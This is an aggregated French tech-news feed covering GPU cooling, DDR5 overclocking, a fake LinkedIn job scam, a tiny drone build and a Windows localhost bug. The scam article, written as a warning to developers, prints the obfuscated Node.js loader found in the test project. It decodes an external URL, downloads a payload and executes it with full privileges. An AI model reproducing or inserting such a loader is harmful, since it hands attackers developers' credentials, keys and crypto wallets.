Les data centers IA chauffent, Frore Systems répond avec LiquidJet, un coldplate liquide en 3D taillé pour les GPU survoltés. L’objectif : faire mieux que les plaques traditionnelles en abaissant la température, la pression et la facture énergétique.

LiquidJet, le coldplate 3D qui veut doper Blackwell Ultra et préparer la suite

Premier terrain de jeu : les GPU NVIDIA Blackwell Ultra jusqu’à 1 400 W. Frore annonce des gains très concrets face aux coldplates classiques : densité de point chaud doublée (600 W/cm² à 40 °C d’entrée), 50 % de KW/lpm en plus, et perte de charge divisée par 4. Résultat attendu : plus de marge thermique, donc plus de fréquence soutenue et de tokens/seconde pour les modèles IA.

La promesse ne s’arrête pas à Blackwell. La plateforme est pensée pour évoluer avec Rubin, Rubin Ultra, Feynman (>4 000 W) et les ASIC des hyperscalers. L’idée : faire une coldplate qui “scale” au rythme de l’IA, sans devoir tout refaire à chaque génération.

Fabrication façon semi-conducteurs, géométrie sur mesure

Là où beaucoup de coldplates restent cantonnées aux microcanaux 2D par skiving, Frore applique des procédés issus du semi-conducteur sur des wafers métalliques. On obtient des microstructures de jets en boucles courtes, véritable architecture 3D, que l’on peut caler précisément sur la carte thermique d’un GPU moderne.

Avantages annoncés : design personnalisable pour épouser n’importe quel SoC, industrialisation plus scalable, intégration en “drop-in” dans les châssis existants, et performances de refroidissement supérieures. Dans un rack, cela se traduit par des GPU plus frais, une meilleure PUE, et un TCO à la baisse.

Pour les exploitants, l’intérêt est très terre-à-terre : garder des GPU coûteux dans leur enveloppe thermique optimale, réduire la pression hydraulique nécessaire, et pousser davantage d’instances par baie sans faire exploser l’OPEX.

En bref, LiquidJet de Fore Systems veut transformer la coldplate en plateforme évolutive pour l’IA : des puces qui changent vite, un refroidissement qui suit, et des performances utiles à la clé.

Les records, c’est bien, mais la stabilité au quotidien, c’est mieux. SafeDisk annonce avoir tenu 10600 MT/s en DDR5 sur une config AM5 bien plus proche d’un PC réel que les démos extrêmes à l’azote liquide.

10600 MT/s en conditions “normales”

Alors que le record officiel culmine à 13010 MT/s dans un contexte extrême (CPU golden, refroidissement LN2, un seul DIMM), SoonHo Jeong (SafeDisk) avec ASUS et G.Skill signent une performance plus « terre à terre » : 10600 MT/s avec deux barrettes de 24 Go, un Ryzen 5 8500G non modifié et un refroidissement standard et un ASUS B850M-AYW OC. Pas de bidouille exotique, pas de limitation artificielle des slots mémoire.

La ASUS B850M-AYW, un modèle micro-ATX orienté overclocking qui n’est pas encore facile à trouver notamment en dehors du marché chinois. Le choix du 8500G n’est pas anodin : l’APU intègre un contrôleur mémoire amélioré par rapport aux CPU Granite Ridge, ce qui aide à grimper en fréquence avec deux modules.

Concrètement, tenir 10600 MT/s en dual-DIMM, timings CL50 et sans refroidissement extrême suggère que des vitesses à cinq chiffres pourraient devenir plus courantes sur la plateforme AM5 à mesure que les BIOS mûrissent et que les prochains CPU Zen 6 arrivent. AMD pourrait en prime activer le support CUDIMM, un levier supplémentaire pour atteindre ces paliers sur davantage de configurations.

Pourquoi c’est important

Au-delà du chiffre, cette démo crédibilise l’idée d’une DDR5 très haut débit exploitable sans installation de laboratoire. Les gains réels dépendront des usages (jeux, APU, productivité mémoire-dépendante), mais voir 10600 MT/s stable avec deux barrettes et un APU mainstream donne un aperçu de ce que pourraient offrir les futurs kits DDR5 et les prochaines itérations d’AM5.

Le plomb est généralement perçu comme une toxine moderne, mais une nouvelle étude révèle qu’il nous hante, ainsi que nos ancêtres, depuis près de deux millions d’années. Plus étonnant encore, cette exposition aurait pu procurer aux humains un avantage sur leurs plus proches parents dans l’arbre évolutif. Une équipe internationale de chercheurs a analysé la ... Lire plus

Vous avez peur que l’IA prenne votre boulot ? Et bien David Dodda, lui, a failli se faire avoir par un faux boulot et c’est son IA qui l’a sauvé ! Je vous explique !

Tout commence classiquement sur LinkedIn. David reçoit un message de Mykola Yanchii, Chief Blockchain Officer chez Symfa, une boîte qui développe des plateformes blockchain. Le profil LinkedIn a l’air béton… Il a plus de 1000 connexions, une page entreprise nickel, bref tout respire le sérieux.

Et son message est pro, poli, et propose à David un poste à temps partiel sur BestCity, une plateforme immobilière. Bref, c’est le genre d’opportunité qu’on ne refuse pas quand on est développeur freelance comme David.

Le premier rendez-vous par visio se passe très bien. Le recruteur connait son sujet, pose les bonnes questions, explique le projet et ensuite, comme dans 99% des processus de recrutement tech, on envoie à David un test technique à réaliser chez lui. Il s’agit d’un projet hébergé sur Bitbucket, du code React et Node.js bien propre et sa mission c’est de compléter quelques fonctionnalités et renvoyer le tout avant la prochaine réunion.

Sauf que David, lui, a pris un réflexe que peu de gens ont. Avant même de lancer npm install, il a demandé à son assistant IA (Cursor) de scanner le code pour détecter d’éventuels patterns suspects. Et là, bingo ! L’IA trouve un truc louche dans le fichier server/controllers/userController.js.

Il s’agit d’un malware qui était bien planqué dans une fonction asynchrone complètement obfusquée. Un tableau d’octets encodé en ASCII qui, une fois décodé en UTF-8, révèle une URL pointant vers une API externe. Et cette URL récupère un payload qui est ensuite exécutée avec tous les privilèges Node.js. Cela débouche à sur un accès complet au système, aux credentials, aux wallets crypto, aux données clients…etc. Le jackpot pour un attaquant !

//Get Cookie
(async () => {
 const byteArray = [
 104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
 110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
 98, 50, 48, 51, 49, 102, 98, 57
 ];
 const uint8Array = new Uint8Array(byteArray);
 const decoder = new TextDecoder('utf-8');
 axios.get(decoder.decode(uint8Array))
 .then(response => {
 new Function("require", response.data.model)(require);
 })
 .catch(error => { });
})();

Et le truc flippant, c’est le niveau de sophistication de l’opération car là on n’a pas affaire à un script kiddie qui balance un trojan par email. Non, c’est une vraie infrastructure professionnelle avec un profil LinkedIn premium, un Calendly pour la prise de rendez-vous, un Bitbucket privé, du code source propre et fonctionnel (hormis le malware planqué). Et surtout, l’URL du malware est devenue HS 24 heures à peine après l’attaque. C’est donc une infrastructure éphémère qui laisse zéro trace.

Si je relaye ce témoignage de David c’est parce que ce genre d’attaque se multiplie. Ce n’est pas un cas isolé… Par exemple le groupe nord-coréen Lazarus utilise cette technique depuis des mois, en créant de fausses entreprises crypto, de faux profils de recruteurs sur LinkedIn, Upwork, Freelancer, et en ciblant spécifiquement les développeurs. Le malware déployé s’appelle BeaverTail, et il installe ensuite un backdoor Python baptisé InvisibleFerret qui fonctionne sur Windows, Linux et macOS. Ce truc vise surtout les extensions de navigateur comme MetaMask ou Coinbase Wallet, récupère tous les mots de passe stockés, et collecte tout ce qui traine.

Alors pourquoi ça marche aussi bien ?

Hé bien parce que les hackers exploitent nos biais cognitifs. L’ambition de décrocher un bon job, la politesse pour ne pas vexer un recruteur, l’urgence créée artificiellement pour qu’on ne prenne pas le temps de réfléchir, la peur de rater une opportunité. Bref, toutes ces émotions qui court-circuitent notre esprit critique.

Heureusement que David a lancé une analyse IA du code sinon, il aurait eu de gros problèmes. Ça prend 30 secondes comme geste barrière et ça peut vous sauver des milliers d’euros et des centaines d’heures de galère.

Si David n’avait pas eu ce réflexe, il aurait lancé npm install, puis npm start, et le malware se serait exécuté en arrière-plan pendant qu’il codait tranquillement ses fonctionnalités. L’attaquant aurait alors eu accès à tout : Ses identifiants GitHub, ses clés SSH, ses tokens d’API, ses wallets crypto si il en a et peut-être même les données de ses clients. Le cauchemar absolu.

Voilà, donc méfiez vous de ce qui arrive via des plateformes de recrutement, on ne sait jamais ! Vous n’aurez peut être pas le job mais vous garderez votre ordinateur propre, vous conserverez vos cryptos, vos mots de passe et vos clients et ça c’est déjà pas si mal !

Source

La startup spécialisée dans l’hyperscaling d’intelligence artificielle Nscale vient de conclure un contrat d’envergure avec Microsoft portant sur le déploiement de matériel Nvidia dans plusieurs centres de données. Mercredi dernier, le fournisseur de cloud d’IA a annoncé la signature d’un accord prévoyant l’installation d’environ 200 000 GPU Nvidia GB300 répartis entre trois sites européens et ... Lire plus

Vous avez déjà passé trois semaines à résoudre un problème qui n’existe pas ?

Hé bien Sam Hoarder, lui, a fait encore mieux. Il a pris un drone FPV déjà ultra-compact, le BetaFPV Air65 avec ses 65mm d’empattement, et l’a transformé en un truc trois fois plus petit, dix fois plus galère à piloter, et totalement inutile !

22 millimètres d’empattement de moteur à moteur, ça qui tient dans une boîte de Pringles et c’est génial. Parce que OUI, dans un monde tech obsédé par des specs toujours plus impressionnantes, des autonomies de 48 heures et des écrans pliables dans tous les sens, Sam a fait un truc qui sert à rien. Il a pris un drone qui vole très bien et s’est dit “hey, comment je pourrais rendre ce drone encore moins pratique à pilote ?”

Les hélices de l’Air65 de base font 31mm de diamètre, les moteurs font 9mm et si on fait se chevaucher les quatre hélices au maximum, on obtient théoriquement 31 - 9 = 22 mm d’empattement. Voilà, c’est tout… sauf que pour y arriver, il a fallu modéliser chaque composant dans SolidWorks, designer un cadre custom en deux plaques avec des supports moteur décalés, imprimer le tout en PLA avec une précision de 0,12 mm, et bien sûr démonter entièrement l’Air65 pour en remonter les moteurs avec des vis de montre, découper des oeillets au micron près, reconfigurer l’orientation du contrôleur de vol dans Betaflight avec un angle à 45°, et croiser les doigts très fort !!

Et le résultat est là puisque sont nouveau drone pèse 25 grammes tout mouillé avec sa batterie Lava 300mAh (qui est plus grande que le drone lui-même, au passage). La batterie dépasse donc littéralement du cadre. On dirait un cure-dent avec un sac à dos son machin et les quatre hélices se frôlent avec un espacement ridicule.

Vous connaissez ce mème que tous les barbus sans originalité ont sur un t-shirt ou une tasse et qui dit : “There’s no place like 127.0.0.1” ? (Oui moi aussi j’ai eu un t-shirt comme ça ^^)

Ce jeu de mots culte fait référence au Magicien d’Oz et surtout au localhost, qui est l’adresse locale où votre machine se connecte à elle-même. Eh bien mauvaise nouvelle, Microsoft vient de la rendre littéralement inopérante avec leurs dernières mises à jour de merde. Ainsi, Windows 11 ne peut plus accéder à sa propre adresse localhost. C’est fou quand même ! On dirait presque une blague mais non…

Les patchs KB5066835 et KB5065789 sortis en joli mois d’octobre ont pété totalement HTTP.sys, un composant du kernel Windows qui permet aux applications de discuter en local via HTTP/2. Du coup, les connexions vers 127.0.0.1 en HTTP/2 plantent systématiquement avec des messages d’erreur du genre ERR_CONNECTION_RESET ou ERR_HTTP2_PROTOCOL_ERROR.

Votre machine ne se reconnaît plus. Elle est là, elle fonctionne, mais elle ne peut plus se pinguer elle-même. Et évidemment, ceux qui trinquent ce sont surtout les développeurs. Visual Studio ne peut plus déboguer correctement, SQL Server Management Studio refuse de se connecter avec l’authentification Entra ID, l’application Duo Desktop, utilisée pour le 2FA, est complètement KO. Même des softs pros comme Autodesk Vault sont touchés.

Bref, si vous bossez avec du dev local ou des outils qui tournent en localhost, vous êtes dans la mierda.

Microsoft a corrigé dans ce patch un nombre record de 175 vulnérabilités CVE, dont 6 zero-days critiques et ils ont aussi fait le ménage en supprimant un vieux driver Agere Modem vieux de 20 ans qui traînait encore. Ils ont nettoyé, sécurisé, et optimisé Windows un peu plus mais visiblement sans faire quelques vérifications de base. Je trouve ça vraiment surprenant qu’aucun dev chez Microsoft ne s’en soit rendu compte avant que ça parte en prod.

Bon et alors, comment on s’en sort de leur nouvelle connerie ? Hé bien il y a 2 solutions, pas très classes mais qui fonctionnent.

La première, c’est de bidouiller le registre Windows pour désactiver HTTP/2. Vous allez dans

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters

wusa /uninstall /kb:5066835

wusa /uninstall /kb:5065789

Merci à vous de suivre le flux Rss de www.sospc.name.

Windows 10 a beau être un Système désormais stable, il peut arriver (encore) que certaines mises à jour ne se passent pas bien.

Si votre ordinateur devient bancal ou ne fonctionne pas bien juste après l'une de ces mises à jour, il vaut mieux rapidement la désinstaller.

Je vais vous proposer deux méthodes, l'une très classique et l'autre pour les cas particuliers où Windows Update ne serait pas accessible ou n'afficherait pas la mise à jour problématique.

Cet article [Astuce] Comment désinstaller une mise à jour (KB) sous Windows 10 est apparu en premier sur votre site préféré www.sospc.name

Alors que l’intelligence artificielle facilite la création de bots de plus en plus réalistes, X (anciennement Twitter) développe une nouvelle fonctionnalité destinée à révéler davantage d’informations sur les personnes derrière chaque profil. L’objectif : permettre aux utilisateurs de mieux comprendre avec qui ils interagissent sur la plateforme d’Elon Musk. Selon une publication récente de Nikita ... Lire plus

Dans le quotidien professionnel, les employés consacrent une part considérable de leur temps à communiquer et se coordonner sur divers projets. Pourtant, la disponibilité des interlocuteurs fragilise souvent ces efforts collaboratifs. Lorsqu’un collègue détenant des informations vitales s’absente (vacances, décalage horaire), le reste de l’équipe doit suspendre ses avancées jusqu’à obtenir une réponse. Ashutosh Garg ... Lire plus

Mercredi dernier, Anthropic a lancé Claude Haiku 4.5, la mouture la plus récente de son modèle le plus léger. Selon un billet publié sur le blog de l’entreprise, cette itération offre des performances comparables à Sonnet 4 tout en coûtant trois fois moins cher et en fonctionnant à une vitesse plus que doublée. L’équilibre entre ... Lire plus

Peu après l’ajout de messages directs cet été, Instagram Threads intègre désormais la fonctionnalité de messagerie de groupe pouvant accueillir jusqu’à 50 personnes. Le concurrent de X détenu par Meta, qui revendique désormais plus de 400 millions d’utilisateurs actifs mensuels, déploie les discussions de groupe à l’échelle mondiale à partir d’aujourd’hui. Parallèlement, l’application étend son ... Lire plus